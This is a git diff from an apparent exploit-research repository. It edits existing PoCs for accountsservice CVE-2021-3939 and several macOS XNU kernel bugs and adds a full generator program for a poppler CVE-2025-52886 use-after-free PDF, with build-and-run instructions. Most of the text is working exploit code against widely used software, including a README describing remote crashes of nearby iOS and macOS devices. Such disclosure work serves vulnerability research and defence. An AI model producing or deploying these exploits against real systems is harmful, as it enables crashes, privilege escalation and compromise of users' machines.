9bb4a14..4080ace 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop @@ -1 +1 @@ -Subproject commit 9bb4a14427dfb7da867cc253f3e064d54b18679a +Subproject commit 4080acee5be79591d72a0ad239303574235a5236 diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler index 019faea..16926a0 160000 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler @@ -1 +1 @@ -Subproject commit 019faea2c0e00ba1047b7a0eb3861769896d6dd1 +Subproject commit 16926a08464267186fb316e615b9363f10d75c8a diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp index 2a037bb..3ef9671 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc.cpp @@ -433,7 +433,7 @@ class Run { // This is declared outside of the loop because we want to remember the // the last value that it's set to. - char email[64] = "kevwozere@kevwozere.com"; + char email[128] = "kevwozere@kevwozere.com"; // Try to occupy the chunk. for (size_t i = 0; i < batch_size1; i++) { diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp index d03cc4c..147a968 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc2.cpp @@ -420,7 +420,7 @@ class AccountsHandler : public DBusHandler { // call the SetEmail method with the same email address as last time, so // that we trigger a polkit check that will get approved, but without // jumbling the memory any further. - char email_[64] = "kevwozere@kevwozere.com"; + char email_[128] = "kevwozere@kevwozere.com"; private: int quit() { @@ -719,7 +719,7 @@ class AccountsHandler : public DBusHandler { // we don't want. accounts_set_property( my_objectpath_.c_str(), "SetEmail", email_, - [this](const DBusMessage&, bool) -> int { + [](const DBusMessage&, bool) -> int { return 0; } ); @@ -806,13 +806,13 @@ int main(int argc, char* argv[]) { EPollManager manager(loop); DBusAuthHandler* polkit_auth_handler = - new DBusAuthHandler(loop, info.uid_, new PolkitHandler(info, manager)); + new DBusAuthHandler(info.uid_, new PolkitHandler(info, manager)); if (loop.add_handler(polkit_auth_handler) < 0) { throw Error(_s("Failed to add PolkitHandler")); } DBusAuthHandler* accounts_auth_handler = - new DBusAuthHandler(loop, info.uid_, new AccountsHandler(info, manager)); + new DBusAuthHandler(info.uid_, new AccountsHandler(info, manager)); if (loop.add_handler(accounts_auth_handler) < 0) { throw Error(_s("Failed to add AccountsHandler")); } diff --git a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp index 7ebe26e..df7f2d2 100644 --- a/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp +++ b/SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/poc3.cpp @@ -428,7 +428,7 @@ class AccountsHandlerBase : public DBusHandler { // call the SetEmail method with the same email address as last time, so // that we trigger a polkit check that will get approved, but without // jumbling the memory any further. - char email_[64] = "kevwozere@kevwozere.com"; + char email_[128] = "kevwozere@kevwozere.com"; public: AccountsHandlerBase( @@ -611,7 +611,7 @@ class AccountsHandler : public AccountsHandlerBase { fflush(stderr); } - int attempt_exploit() { + int attempt_exploit() override { choose_batch_size(); return findUserByID( @@ -637,7 +637,7 @@ class AccountsHandler : public AccountsHandlerBase { accounts_set_property( my_objectpath_.c_str(), "SetEmail", email_, - [this](const DBusMessage&, bool) -> int { + [](const DBusMessage&, bool) -> int { return 0; } ); @@ -767,7 +767,7 @@ class TriggerBugHandler : public AccountsHandlerBase { ); } - int attempt_exploit() { + int attempt_exploit() override { choose_batch_size(); const pid_t pid = search_pid(accounts_daemon, sizeof(accounts_daemon)); @@ -868,19 +868,19 @@ int main(int argc, char* argv[]) { // In the child process, we just continually trigger the bug at // 1-second intervals. DBusAuthHandler* trigger_bug_auth_handler = - new DBusAuthHandler(loop, info.uid_, new TriggerBugHandler(info, manager)); + new DBusAuthHandler(info.uid_, new TriggerBugHandler(info, manager)); if (loop.add_handler(trigger_bug_auth_handler) < 0) { throw Error(_s("Failed to add TriggerBugHandler")); } } else { DBusAuthHandler* polkit_auth_handler = - new DBusAuthHandler(loop, info.uid_, new PolkitHandler(info, manager)); + new DBusAuthHandler(info.uid_, new PolkitHandler(info, manager)); if (loop.add_handler(polkit_auth_handler) < 0) { throw Error(_s("Failed to add PolkitHandler")); } DBusAuthHandler* accounts_auth_handler = - new DBusAuthHandler(loop, info.uid_, new AccountsHandler(info, manager)); + new DBusAuthHandler(info.uid_, new AccountsHandler(info, manager)); if (loop.add_handler(accounts_auth_handler) < 0) { throw Error(_s("Failed to add AccountsHandler")); } diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md index 109c6cf..96d0ac4 100644 --- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md +++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/README.md @@ -1,4 +1,4 @@ -For more information about this exploit PoC, see the [blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782). +For more information about this exploit PoC, see the [blog post](https://securitylab.github.com/research/apple-xnu-dtrace-CVE-2017-13782/). This exploit PoC is designed for macOS High Sierra version 10.13. Apple released a patch on [Oct 31, 2017](https://support.apple.com/en-us/HT208221). diff --git a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c index 9b03e1c..f838f4f 100644 --- a/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c +++ b/SecurityExploits/apple/darwin-xnu/DTrace/CVE-2017-13782/cve-2017-13782-poc.c @@ -2,7 +2,6 @@ * Copyright Kevin Backhouse / Semmle Ltd (2017) * License: Apache License 2.0 * - * For more information: https://lgtm.com/blog/apple_xnu_dtrace_cve-2017-13782 */ #include #include diff --git a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md index 1dfd364..b6b0d40 100644 --- a/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md +++ b/SecurityExploits/apple/darwin-xnu/icmp_error_CVE-2018-4407/README.md @@ -2,7 +2,7 @@ Proof-of-concept exploit for a remotely triggerable heap buffer overflow vulnerability in iOS 11.4.1 and macOS 10.13.6. This exploit can be used to crash any vulnerable iOS or macOS device that is connected to the same network as the attacker's computer. The vulnerability can be triggered without any user interaction on the victim's device. The exploit involves sending a TCP packet with non-zero options in the IP and TCP headers. It is possible that some routers or switches will refuse to deliver such packets, but it has worked for me on all the home and office networks that I have tried it on. However, I have found that it is not usually possible to send the malicious packet across the internet. -For more information about the vulnerability, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407). +For more information about the vulnerability, see the [blog post](https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407/). The buffer overflow is in this code [bsd/netinet/ip_icmp.c:339](https://github.com/apple/darwin-xnu/blob/0a798f6738bc1db01281fc08ae024145e84df927/bsd/netinet/ip_icmp.c#L339): diff --git a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md index dc692ac..6d8a9bb 100644 --- a/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md +++ b/SecurityExploits/apple/darwin-xnu/nfs_vfsops_CVE-2018-4259/README.md @@ -2,7 +2,7 @@ This directory contains a minimal [NFS](https://en.wikipedia.org/wiki/Network_File_System) server. It only implements a very small subset of the [NFS protocol](https://www.ietf.org/rfc/rfc1813.txt): just enough to trigger one of the buffer overflow vulnerabilities in the macOS XNU operating system kernel. The vulnerabilities were fixed in macOS version [10.13.6](https://support.apple.com/en-gb/HT208937). -For more details about the vulnerabilities, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_nfs_vfsops_CVE-2018-4259). +For more details about the vulnerabilities, see the [blog post](https://securitylab.github.com/research/cve-2018-4259-macos-nfs-vulnerability/). To compile and run (on Linux): diff --git a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md index ea94b42..a55efe8 100644 --- a/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md +++ b/SecurityExploits/apple/darwin-xnu/packet_mangler_CVE-2017-13904/README.md @@ -4,4 +4,4 @@ Proof-of-concept exploit for remote code execution vulnerability in the packet-m Update: Apple's fix for the infinite loop bug was incomplete. The fix for CVE-2018-4460 was released on December 5, 2018. -For details on how to compile and run this exploit, see the [blog post on lgtm.com](https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904). +For details on how to compile and run this exploit, see the [blog post](https://securitylab.github.com/research/CVE-2018-4249-apple-xnu-packet-mangler/). diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore new file mode 100644 index 0000000..a8ff98c --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/.gitignore @@ -0,0 +1 @@ +pdfgen diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile new file mode 100644 index 0000000..989e543 --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/Makefile @@ -0,0 +1,2 @@ +pdfgen: pdfgen.cpp utils.cpp utils.h + g++ -Wall -Wextra -g -O0 pdfgen.cpp utils.cpp -lz -o pdfgen diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md new file mode 100644 index 0000000..0f480bb --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/README.md @@ -0,0 +1,25 @@ +# Proof of concept for poppler CVE-2025-52886 + +CVE-2025-52886 is a use-after-free vulnerability in +[poppler](https://gitlab.freedesktop.org/poppler), caused by a +reference count overflow. Reference counting was done with a 32-bit +counter, which meant it was feasible to overflow the counter. In my +testing, it took approximately 12 hours to overflow the counter +though, so the risk of exploitation was low. + +This directory contains the code for building the proof-of-concept. To +run it: + +```bash +make +./pdfgen > poc.pdf +``` + +Notice that the size of the generated PDF is only 3104 bytes. Now try +to either open the PDF or run a command line application like +`pdftohtml` on it. + +## Links: + +* https://gitlab.freedesktop.org/poppler/poppler/-/issues/1581 +* https://securitylab.github.com/advisories/GHSL-2025-054_poppler/ diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp new file mode 100644 index 0000000..34514db --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/pdfgen.cpp @@ -0,0 +1,626 @@ +#include "utils.h" +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// Exception class. Caught in main(). +class Error : public std::exception { + std::string msg_; + +public: + Error() = delete; // No default constructor. + explicit Error(const char *msg) : msg_(msg) {} + explicit Error(std::string &&msg) : msg_(std::move(msg)) {} + + const char *what() const noexcept override { return msg_.c_str(); } +}; + +void write_hexdigit(WriteBuf &buf, const uint8_t x) { + if (x < 10) { + buf.write_uint8('0' + x); + } else if (x < 16) { + buf.write_uint8('A' + x - 10); + } else { + throw Error("Bad hex digit"); + } +} + +void write_octal_uint8(WriteBuf &buf, const uint8_t x) { + write_hexdigit(buf, x >> 6); + write_hexdigit(buf, (x >> 3) & 0x7); + write_hexdigit(buf, x & 0x7); +} + +void write_hex_uint8(WriteBuf &buf, const uint8_t x) { + write_hexdigit(buf, x >> 6); + write_hexdigit(buf, (x >> 3) & 0x7); + write_hexdigit(buf, x & 0x7); +} + +void write_stringobj(WriteBuf &buf, const std::string &str) { + buf.write_string("("); + for (auto c : str) { + if (isprint(c)) { + buf.write_uint8(c); + } else { + buf.write_uint8('\\'); + write_octal_uint8(buf, static_cast(c)); + } + } + buf.write_string(")"); +} + +void write_nameobj(WriteBuf &buf, const std::string &str) { + buf.write_string("/"); + for (auto c : str) { + if (isprint(c)) { + buf.write_uint8(c); + } else { + buf.write_uint8('#'); + write_octal_uint8(buf, static_cast(c)); + } + } + buf.write_string(" "); +} + +void write_intobj(WriteBuf &buf, int i) { + char str[32]; + snprintf(str, sizeof(str), "%d ", i); + buf.write_string(str); +} + +void write_numobj(WriteBuf &buf, double d) { + char str[64]; + snprintf(str, sizeof(str), "%f ", d); + buf.write_string(str); +} + +void write_command(WriteBuf &buf, const std::string &cmd) { + buf.write_string(cmd.c_str()); + buf.write_string("\n"); +} + +class PDF { +public: + PDF() {} + virtual ~PDF() {} + + virtual void write(WriteBuf &buf) const = 0; +}; + +typedef std::unique_ptr PDFptr; +typedef std::vector PDFvec; + +// Utility for reading the current file offset. +class PDF_ReadPreOffset : public PDF { + const std::function f_; + const PDFptr child_; + +public: + PDF_ReadPreOffset(std::function &&f, PDFptr &&child) + : f_(std::move(f)), child_(std::move(child)) {} + + static std::unique_ptr mk(std::function &&f, + PDFptr &&child) { + return std::make_unique(std::move(f), std::move(child)); + } + + void write(WriteBuf &buf) const override { + f_(buf.offset()); + child_->write(buf); + } +}; + +// Utility for reading the current file offset. +class PDF_ReadPostOffset : public PDF { + const std::function f_; + const PDFptr child_; + +public: + PDF_ReadPostOffset(std::function &&f, PDFptr &&child) + : f_(std::move(f)), child_(std::move(child)) {} + + static std::unique_ptr mk(std::function &&f, + PDFptr &&child) { + return std::make_unique(std::move(f), std::move(child)); + } + + void write(WriteBuf &buf) const override { + child_->write(buf); + f_(buf.offset()); + } +}; + +class PDF_Int : public PDF { + const int i_; + +public: + explicit PDF_Int(int i) : i_(i) {} + + static std::unique_ptr mk(int i) { + return std::make_unique(i); + } + + void write(WriteBuf &buf) const override { write_intobj(buf, i_); } +}; + +// Like PDF_Int, except with padded output so that the number of +// characters is always the same. This is useful for integer values +// that aren't known until the second pass. +class PDF_IntF : public PDF { + const int i_; + const int w_; + +public: + explicit PDF_IntF(int i, int w) : i_(i), w_(w) {} + + static std::unique_ptr mk(int i, int w = 10) { + return std::make_unique(i, w); + } + + void write(WriteBuf &buf) const override { + char str[32]; + assert(0 <= w_ && w_ < static_cast(sizeof(str))); + snprintf(str, sizeof(str), "%*d", w_, i_); + buf.write_bytes((const uint8_t *)str, w_); + buf.write_string("\n"); + } +}; + +class PDF_Num : public PDF { + const double d_; + +public: + explicit PDF_Num(double d) : d_(d) {} + + static std::unique_ptr mk(double d) { + return std::make_unique(d); + } + + void write(WriteBuf &buf) const override { write_numobj(buf, d_); } +}; + +class PDF_Ref : public PDF { + const int num_; + const int gen_; + +public: + PDF_Ref(int num, int gen) : num_(num), gen_(gen) {} + + static std::unique_ptr mk(int num, int gen) { + return std::make_unique(num, gen); + } + + void write(WriteBuf &buf) const override { + write_intobj(buf, num_); + write_intobj(buf, gen_); + buf.write_string("R "); + } +}; + +class PDF_Cmd : public PDF { + const std::string cmd_; + +public: + explicit PDF_Cmd(std::string &&cmd) : cmd_(std::move(cmd)) {} + + static std::unique_ptr mk(std::string &&cmd) { + return std::make_unique(std::move(cmd)); + } + + void write(WriteBuf &buf) const override { write_command(buf, cmd_); } +}; + +class PDF_Name : public PDF { + const std::string name_; + +public: + explicit PDF_Name(std::string &&name) : name_(std::move(name)) {} + + static std::unique_ptr mk(std::string &&name) { + return std::make_unique(std::move(name)); + } + + void write(WriteBuf &buf) const override { write_nameobj(buf, name_); } +}; + +class PDF_String : public PDF { + const std::string str_; + +public: + explicit PDF_String(std::string &&str) : str_(std::move(str)) {} + + static std::unique_ptr mk(std::string &&str) { + return std::make_unique(std::move(str)); + } + + void write(WriteBuf &buf) const override { write_stringobj(buf, str_); } +}; + +class PDF_Comment : public PDF { + const std::string comment_; + +public: + explicit PDF_Comment(std::string &&comment) : comment_(std::move(comment)) {} + + static std::unique_ptr mk(std::string &&comment) { + return std::make_unique(std::move(comment)); + } + + void write(WriteBuf &buf) const override { + buf.write_string("%"); + buf.write_string(comment_.c_str()); + buf.write_string("\n"); + } +}; + +class PDF_Seq : public PDF { + const PDFvec seq_; + +public: + explicit PDF_Seq(std::vector> &&seq) + : seq_(std::move(seq)) {} + + static std::unique_ptr mk(PDFvec &&seq) { + return std::make_unique(std::move(seq)); + } + + void write(WriteBuf &buf) const override { + for (auto &x : seq_) { + x->write(buf); + } + } +}; + +class PDF_Array : public PDF { + const PDFvec array_; + +public: + explicit PDF_Array(std::vector> &&array) + : array_(std::move(array)) {} + + static std::unique_ptr mk(PDFvec &&array) { + return std::make_unique(std::move(array)); + } + + void write(WriteBuf &buf) const override { + buf.write_string("[ "); + for (auto &x : array_) { + x->write(buf); + } + buf.write_string("] "); + } +}; + +// key-value pair for a dict. +struct PDF_KV { + std::string key_; + PDFptr value_; + + PDF_KV(std::string &&key, PDFptr &&value) + : key_(std::move(key)), value_(std::move(value)) {} +}; + +class PDF_Dict : public PDF { + const std::vector dict_; + +public: + explicit PDF_Dict(std::vector &&dict) : dict_(std::move(dict)) {} + + static std::unique_ptr mk(std::vector &&dict) { + return std::make_unique(std::move(dict)); + } + + void write(WriteBuf &buf) const override { + buf.write_string("<< "); + for (auto &kv : dict_) { + write_nameobj(buf, kv.key_); + kv.value_->write(buf); + } + buf.write_string(">> "); + } +}; + +class PDF_Stream : public PDF { + const std::vector stream_; + +public: + explicit PDF_Stream(const std::string &str) + : stream_(str.begin(), str.end()) {} + + explicit PDF_Stream(std::vector &&stream) + : stream_(std::move(stream)) {} + + static std::unique_ptr mk(const std::string &str) { + return std::make_unique(str); + } + + static std::unique_ptr mk(std::vector &&stream) { + return std::make_unique(std::move(stream)); + } + + void write(WriteBuf &buf) const override { + buf.write_string("stream\n"); + buf.write_bytes(stream_.data(), stream_.size()); + buf.write_string(" endstream\n"); + } +}; + +struct OffsetsTable { + size_t filesize_ = 0; + size_t startbody_ = 0; + size_t startxref_ = 0; + + size_t ref001_ = 0; + size_t ref002_ = 0; + size_t ref003_ = 0; + size_t ref004_ = 0; + size_t ref005_ = 0; + size_t ref006_ = 0; + + size_t stream000_start_ = 0; + size_t stream000_end_ = 0; +}; + +static const size_t XRefEntrySize = sizeof(uint32_t) + 2 * sizeof(uint64_t); + +static void writeXRefEntry(uint8_t *entry, uint32_t type, uint64_t offset, + uint64_t gen) { + *(uint32_t *)entry = htobe32(type); + entry += sizeof(type); + *(uint64_t *)entry = htobe64(offset); + entry += sizeof(offset); + *(uint64_t *)entry = htobe64(gen); +} + +static PDFptr mkAnnotOverflow(const OffsetsTable &offsets) { + const int first0 = 0; + const int len0 = 7; + const int first1 = static_cast(offsets.ref005_); + const int len1 = 1; + const int numEntries = len0 + len1; + const int streamsize = numEntries * XRefEntrySize; + std::vector stream(streamsize); + uint8_t *streamdata = stream.data(); + + writeXRefEntry(streamdata, 1, 0, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref001_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref002_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref003_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref004_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 2, offsets.ref005_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref006_, 0); + streamdata += XRefEntrySize; + writeXRefEntry(streamdata, 1, offsets.ref005_, 0); + + return PDF_Seq::mk(_vec( + PDF_Int::mk(1337), PDF_Int::mk(133713), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Size"), PDF_Int::mk(1337)), + PDF_KV(std::string("Length"), PDF_Int::mk(streamsize)), + PDF_KV(std::string("Prev"), + PDF_Int::mk(-1)), // link to next XRef table + PDF_KV(std::string("Root"), PDF_Ref::mk(1, 0)), + PDF_KV(std::string("Index"), + PDF_Array::mk(_vec( + PDF_IntF::mk(first0, 4), PDF_IntF::mk(len0, 3), + PDF_IntF::mk(first1, 4), PDF_IntF::mk(len1, 3)))), + PDF_KV(std::string("W"), + PDF_Array::mk(_vec(PDF_Int::mk(4), PDF_Int::mk(8), + PDF_Int::mk(8)))))), + PDF_Stream::mk(std::move(stream)))); +} + +static PDFptr mkContents(OffsetsTable &offsets) { + const int streamsize = + static_cast(offsets.stream000_end_ - offsets.stream000_start_); + return PDF_Seq::mk(_vec( + PDF_Dict::mk(_vec( + PDF_KV(std::string("Length"), PDF_IntF::mk(streamsize)))), + PDF_ReadPostOffset::mk( + [&offsets](size_t offset) { offsets.stream000_start_ = offset; }, + PDF_Cmd::mk("stream")), + PDF_Name::mk("kevstatearg"), PDF_Cmd::mk("gs"), + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.stream000_end_ = offset; }, + PDF_Cmd::mk("endstream")))); +} + +static const int mkAnnotArray_first = 20; + +static std::vector mkAnnotArray_ObjectStream(size_t nElements, + size_t nLayers) { + std::vector txt(mkAnnotArray_first); + + PDFptr prologue = PDF_Seq::mk( + _vec(PDF_IntF::mk(5), PDF_Int::mk(mkAnnotArray_first))); + WriteBuf buf(txt.data(), mkAnnotArray_first); + prologue->write(buf); + while (buf.offset() < mkAnnotArray_first) { + buf.write_string(" "); + } + + char reftxt[6] = {'6', ' ', '0', ' ', 'R', ' '}; + + const size_t offset = txt.size(); + txt.resize(offset + nElements * sizeof(reftxt) + 2); + uint8_t *p = txt.data() + offset; + *p++ = '['; + for (size_t i = 0; i < nElements; i++) { + memcpy(p, reftxt, sizeof(reftxt)); + p += sizeof(reftxt); + } + *p++ = ']'; + + for (size_t i = 0; i < nLayers; i++) { + std::vector tmp; + compress(tmp, txt); + txt = std::move(tmp); + } + + return txt; +} + +static PDFptr mkAnnots() { + static const std::vector annots_txt( + mkAnnotArray_ObjectStream(0x1000000, 2)); + std::vector txt = annots_txt; + const int streamsize = static_cast(txt.size()); + return PDF_Seq::mk(_vec( + PDF_Dict::mk(_vec( + PDF_KV(std::string("N"), PDF_IntF::mk(1)), + PDF_KV(std::string("First"), PDF_Int::mk(mkAnnotArray_first)), + PDF_KV(std::string("Length"), PDF_Int::mk(streamsize)), + PDF_KV(std::string("Filter"), + PDF_Array::mk(_vec(PDF_Name::mk("FlateDecode"), + PDF_Name::mk("FlateDecode")))))), + PDF_Stream::mk(std::move(txt)))); +} + +static PDFptr mkBody(OffsetsTable &offsets) { + const int numKids = 256; + std::vector kids; + for (size_t i = 0; i < numKids; i++) { + kids.push_back(PDF_Ref::mk(3, 0)); + } + return PDF_Seq::mk(_vec( + // root + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref001_ = offset; }, + PDF_Int::mk(1)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Pages"), PDF_Ref::mk(2, 0)), + PDF_KV(std::string("AcroForm"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Fields"), + PDF_Array::mk(_vec(PDF_Ref::mk(6, 0)))))) + + ), + PDF_KV(std::string("Size"), PDF_Int::mk(2)), + PDF_KV(std::string("Length"), PDF_Int::mk(1337)))), + // pages + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref002_ = offset; }, + PDF_Int::mk(2)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Pages"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Count"), PDF_Int::mk(1))))), + PDF_KV(std::string("Size"), PDF_Int::mk(2)), + PDF_KV(std::string("Count"), PDF_Int::mk(numKids)), + PDF_KV(std::string("Kids"), PDF_Array::mk(std::move(kids))), + PDF_KV(std::string("Length"), PDF_Int::mk(1337)))), + // kid + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref003_ = offset; }, + PDF_Int::mk(3)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk( + _vec(PDF_KV(std::string("Type"), PDF_Name::mk("Page")), + PDF_KV(std::string("Contents"), PDF_Ref::mk(4, 0)), + PDF_KV(std::string("Annots"), PDF_Ref::mk(5, 0)), + PDF_KV(std::string("Size"), PDF_Int::mk(2)), + PDF_KV(std::string("Count"), PDF_Int::mk(1)))), + // contents + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref004_ = offset; }, + PDF_Int::mk(4)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), mkContents(offsets), + // annots + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref005_ = offset; }, + PDF_IntF::mk(static_cast(offsets.ref005_))), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), mkAnnots(), + // widget + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.ref006_ = offset; }, + PDF_IntF::mk(6)), + PDF_Int::mk(0), PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Subtype"), PDF_Name::mk("Widget")), + PDF_KV(std::string("DV"), PDF_String::mk("kevwozere001")), + PDF_KV(std::string("V"), PDF_String::mk("kevwozere002")), + PDF_KV(std::string("Ff"), PDF_Int::mk(0xDEADBEEF)), + PDF_KV(std::string("MaxLen"), PDF_Int::mk(0xDEADBEEF)), + PDF_KV(std::string("F"), PDF_Int::mk(2)), // Annot::flagHidden + PDF_KV(std::string("Rect"), + PDF_Array::mk(_vec(PDF_Int::mk(2), PDF_Int::mk(3), + PDF_Int::mk(4), PDF_Int::mk(5)))), + PDF_KV(std::string("FT"), PDF_Name::mk("Tx")))))); +} + +static PDFptr mkXRef(const OffsetsTable &offsets) { + return mkAnnotOverflow(offsets); +} + +static PDFptr mkPDF(OffsetsTable &offsets) { + return PDF_Seq::mk(_vec( + PDF_Comment::mk("PDF-1.7"), PDF_Int::mk(4), PDF_Int::mk(0), + PDF_Cmd::mk("obj"), + PDF_Dict::mk(_vec( + PDF_KV(std::string("Linearized"), PDF_Int::mk(-1)), + PDF_KV(std::string("L"), + PDF_IntF::mk(static_cast(offsets.filesize_))), + PDF_KV(std::string("T"), PDF_Int::mk(1000000)))), + PDF_Cmd::mk("endobj"), + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.startbody_ = offset; }, + mkBody(offsets)), + PDF_ReadPreOffset::mk( + [&offsets](size_t offset) { offsets.startxref_ = offset; }, + mkXRef(offsets)), + PDF_Cmd::mk("startxref"), + PDF_IntF::mk(static_cast(offsets.startxref_)), + PDF_ReadPostOffset::mk( + [&offsets](size_t offset) { offsets.filesize_ = offset; }, + PDF_Comment::mk("%EOF")))); +} + +int main() { + try { + std::vector rawbuf(0x10000); + + OffsetsTable offsets; + + WriteBuf buf(rawbuf.data(), rawbuf.size()); + + offsets.ref005_ = 100; + // Two passes. The first pass calculates the values of filesize and + // startxref. + PDFptr pdf = mkPDF(offsets); + pdf->write(buf); + + const size_t oldfilesize = buf.offset(); + buf.reset(); + + pdf = mkPDF(offsets); + pdf->write(buf); + if (oldfilesize != buf.offset()) { + throw Error("filesize changed on second pass"); + } + + buf.write_to_fd(STDOUT_FILENO); + + return EXIT_SUCCESS; + } catch (Error &e) { + fprintf(stderr, "%s\n", e.what()); + return EXIT_FAILURE; + } +} diff --git a/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp new file mode 100644 index 0000000..5de68bd --- /dev/null +++ b/SecurityExploits/freedesktop/poppler-CVE-2025-52886/utils.cpp @@ -0,0 +1,147 @@ +#include "utils.h" +#include +#include +#include +#include +#include +#include +#include + +// Write a uint8_t to starting address &buf[pos]. +size_t WriteBuf::write_uint8_at(size_t pos, uint8_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint8_t)); + buf_[pos++] = x; + return pos; +} + +// Write a uint16_t to starting address &buf_[pos] (in big endian +// order). +size_t WriteBuf::write_uint16_at(size_t pos, uint16_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint16_t)); + buf_[pos++] = (x >> 8) & 0xFF; + buf_[pos++] = x & 0xFF; + return pos; +} + +// Write a uint32_t to starting address &buf_[pos] (in big endian +// order). +size_t WriteBuf::write_uint32_at(size_t pos, uint32_t x) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= sizeof(uint32_t)); + buf_[pos++] = (x >> 24) & 0xFF; + buf_[pos++] = (x >> 16) & 0xFF; + buf_[pos++] = (x >> 8) & 0xFF; + buf_[pos++] = x & 0xFF; + return pos; +} + +// Write a block of bytes to starting address &buf_[pos]. +size_t WriteBuf::write_many_at(size_t pos, uint8_t x, size_t n) { + assert(bufsize_ >= pos); + assert(bufsize_ - pos >= n); + memset(&buf_[pos], 